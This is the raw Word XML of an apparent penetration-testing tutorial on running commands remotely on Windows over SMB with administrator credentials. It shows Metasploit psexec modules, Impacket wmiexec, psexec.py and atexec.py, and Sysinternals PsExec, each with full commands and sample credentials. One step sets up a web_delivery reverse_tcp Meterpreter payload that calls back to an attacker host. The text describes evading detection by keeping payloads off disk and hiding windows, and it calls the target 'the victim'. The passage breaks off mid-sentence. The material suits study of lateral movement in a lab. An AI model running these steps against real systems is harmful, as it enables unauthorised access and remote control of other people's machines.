    <w:p w14:paraId="494D18FC"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uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC457EF" w14:textId="78B24B2B"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FDF4F1D">
          <v:shape id="_x0000_i1361" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId65" w:name="DefaultOcxName17" w:shapeid="_x0000_i13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710"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="1198468B" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="606E443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013CBEE4"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1273E56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0335741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34B2A3FA"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7665" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44499051"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&gt; use exploit/windows/smb/psexec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5532482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 windows/smb/psexec) &gt; set rhost 192.168.1.104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05061446"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 &gt; set smbuser administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554485B0"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 &gt; set smbpass Ignite@123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C99CFC"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 &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19D6F18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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD8AC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rhost –&gt; IP of victim PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC11AD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smbuser –&gt; username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F157F"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smbpass –&gt; password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258AB36" w14:textId="7AFCC18E"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64EB1121" wp14:editId="65369B9D">
            <wp:extent cx="5731510" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="254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5EAD1D0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Once the commands run you will gain a </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter session</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> of your victim’s PC and so you can access it as you want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32401473"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Microsoft Windows Authenticated Powershell Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D575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uses a valid administrator username and password to execute a PowerShell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED97F4" w14:textId="7239A70A"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28FD1A19">
          <v:shape id="_x0000_i1360" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId67" w:name="DefaultOcxName16" w:shapeid="_x0000_i13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220"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="79F88438" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27EB2736"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034C059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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167FCD9F"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40001D16"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5F68BB0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8175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FDC7DF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lastRenderedPageBreak/>
              <w:t>msf &gt; use exploit/windows/smb/psexec_psh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D97F4A"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lastRenderedPageBreak/>
              <w:t>msf exploit(windows/smb/psexec_psh) &gt; set rhost 192.168.1.104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF51ED0"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exploit(windows/smb/psexec_psh) &gt; set smbuser administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18ABDEB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exploit(windows/smb/psexec_psh) &gt; set smbpass Ignite@123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148CD5F3"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exploit(windows/smb/psexec_psh) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DF55A58"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Once again as the commands run you will gain a </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter session</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> of victim’s PC. And therefore, you can do as you wish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897C180" w14:textId="09B9FD0E"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10DEF545" wp14:editId="25069CCC">
            <wp:extent cx="4486275" cy="3076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6275" cy="3076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E73C0B"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Microsoft Windows Authenticated Administration Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F74517"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uses a valid administrator username and password </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>to execute an arbitrary command on one or more hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>, using a similar technique than the “psexec” utility provided by SysInternals. Daisy chaining commands with ‘&amp;’ do not work and users shouldn’t try it. This module is useful because it doesn’t need to upload any binaries to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16226E0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Thus, in a new Metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4DBBD" w14:textId="273E7667"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547416C8">
          <v:shape id="_x0000_i1359" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId69" w:name="DefaultOcxName22" w:shapeid="_x0000_i13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FD1F03" w:rsidRPr="00873D4D" w14:paraId="3EC71C82" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CEB489"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2BF09B3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487ECC8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4379C23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311DA4E2"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10815" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594B3C34"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exploit/multi/script/web_delivery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3651896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set target 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71103D0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set payload windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="170334B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set lhost 192.168.1.106</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710A9A1C"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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="779D7646" w14:textId="719FCA41"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049AD1C6" wp14:editId="292E55D6">
            <wp:extent cx="4486275" cy="18478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6275" cy="1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF4D78"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Copy the highlighted text for malicious dll code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBE01E" w14:textId="39CD8FE6"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426E479C">
          <v:shape id="_x0000_i1358" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId71" w:name="DefaultOcxName32" w:shapeid="_x0000_i13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FD1F03" w:rsidRPr="00873D4D" w14:paraId="1B19FD29" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B31AB8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0B8F1319"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0ADC5584"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41C95B9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64CC1B0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p w14:paraId="0536C873"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11325" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B48785"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&gt; use auxiliary/admin/smb/psexec_command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BFC572"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auxiliary(admin/smb/psexec_command) &gt; set rhosts 192.168.1.104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49066EDF"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auxiliary(admin/smb/psexec_command) &gt; set smbuser administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D82D4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auxiliary(admin/smb/psexec_command) &gt; set smbpass Ignite@123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E4E4646"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auxiliary(admin/smb/psexec_command) &gt; set COMMAND [Paste above copied dll code here]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEAD5D5"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auxiliary(admin/smb/psexec_command) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F11CAE3" w14:textId="2DC64F3C"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1BBE0BBC" wp14:editId="6F9E7A4A">
            <wp:extent cx="5731510" cy="32086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78A13AC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soon as we run psexec auxiliary we will get a meterpreter session with as an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C580B94" w14:textId="36EB6E24"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64D4D987" wp14:editId="2ED18516">
            <wp:extent cx="5731510" cy="24149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414905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C10435"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SMB Impacket WMI Exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB3E1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is a similar approach to psexec but executing commands through WMI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131AEF13" w14:textId="057632F8"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54A9ECA7">
          <v:shape id="_x0000_i1357" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId74" w:name="DefaultOcxName42" w:shapeid="_x0000_i13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FD1F03" w:rsidRPr="00873D4D" w14:paraId="57EAD744" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B526E24"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7458246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747A897E"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1BF99898"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515FAF66"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p w14:paraId="5ED8AE06"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9180" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39991171"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&gt; use auxiliary/scanner/smb/impacket/wmiexec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403F002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auxiliary(scanner/smb/impacket/wmiexec) &gt; set rhosts 192.168.1.104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF5CBC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auxiliary(scanner/smb/impacket/wmiexec) &gt; set smbuser administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F979BE9"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auxiliary(scanner/smb/impacket/wmiexec) &gt; set smbpass Ignite@123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="664514D5"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auxiliary(scanner/smb/impacket/wmiexec) &gt; set COMMAND systeminfo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="033D0B65"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auxiliary(scanner/smb/impacket/wmiexec) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="675120AC" w14:textId="28F8AE64"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15E8AFFE" wp14:editId="7178238C">
            <wp:extent cx="5731510" cy="591756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917565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F5694"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Impacket for Psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A893B6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Psexec.py lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB92E9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let’s install the Impacket tools from GitHub. You can get it from here. Firstly, clone the git, and then install the Impacket and then run psexec.py to connect the victim’s machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C6171" w14:textId="1A15DFBF"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AB45747">
          <v:shape id="_x0000_i1356" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId76" w:name="DefaultOcxName52" w:shapeid="_x0000_i13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080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="4B8CCF5E" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B73140C"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lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D51510"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7195AE4C"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164C8F40"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7035" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1220449F"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git clone https://github.com/CoreSecurity/impacket.git</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF54E57"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cd impacket/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCB63D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python setup.py install</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C292F7"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cd examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73FC277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Syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> ./psexec.py [[domain/] username [: password] @] [Target IP Address]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B838DD3" w14:textId="0C5D268F"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384F485">
          <v:shape id="_x0000_i1355" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId77" w:name="DefaultOcxName62" w:shapeid="_x0000_i13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960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="439FF852" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70E4A01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915" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DDF1E74"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./psexec.py SERVER/Administrator:Ignite@192.168.1.104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B0633C2" w14:textId="5B07994A"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6EA54EDB" wp14:editId="2C83E57C">
            <wp:extent cx="5731510" cy="16236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p>
    <w:p w14:paraId="67FC8EBD"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Impacket for Atexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFCCCD6"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example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B285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Syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1556D84A" w14:textId="09598976"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56CF1EC5">
          <v:shape id="_x0000_i1354" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId79" w:name="DefaultOcxName72" w:shapeid="_x0000_i13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715"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="26521698" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB44415"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8670" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A4B220"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./atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36399C1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you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24E4CB" w14:textId="215D14B3"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62DC451B" wp14:editId="38CCBC35">
            <wp:extent cx="5731510" cy="33737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316A3323"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PsExec.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52389510"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Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with the advantage of doing nothing manually. Download this software from –&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>http://download.sysinternals.com/files/PSTools.zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB6E5D"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Unzip the file once you have downloaded it. Go to your command prompt and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3485C0AD" w14:textId="5B369225"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3753F8F9">
          <v:shape id="_x0000_i1353" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId81" w:name="DefaultOcxName81" w:shapeid="_x0000_i13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845"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="798B5C90" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3D6CF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7800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="718AEBF7"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PsExec.exe\\192.168.1.104 -u administrator -p Ignite@123 cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="726AE7A3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4544A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192.168.1.104 –&gt; is the IP of the remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E66F4C3"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-u –&gt; denotes username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8A49E"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-p –&gt; denotes password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260420D"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cmd –&gt; to enter victim’s command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2C1EA" w14:textId="6A3465A3"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2B832BF8" wp14:editId="692C793F">
            <wp:extent cx="5731510" cy="2079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6D661C00"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Atelier Web Remote Commander</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D1EB8"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is graphical software that let us gain control of the victim’s PC that too quite easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A02FEB"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Once you have open the software give the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>IP address </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>of your victim’s PC in remote host box along with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>password </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
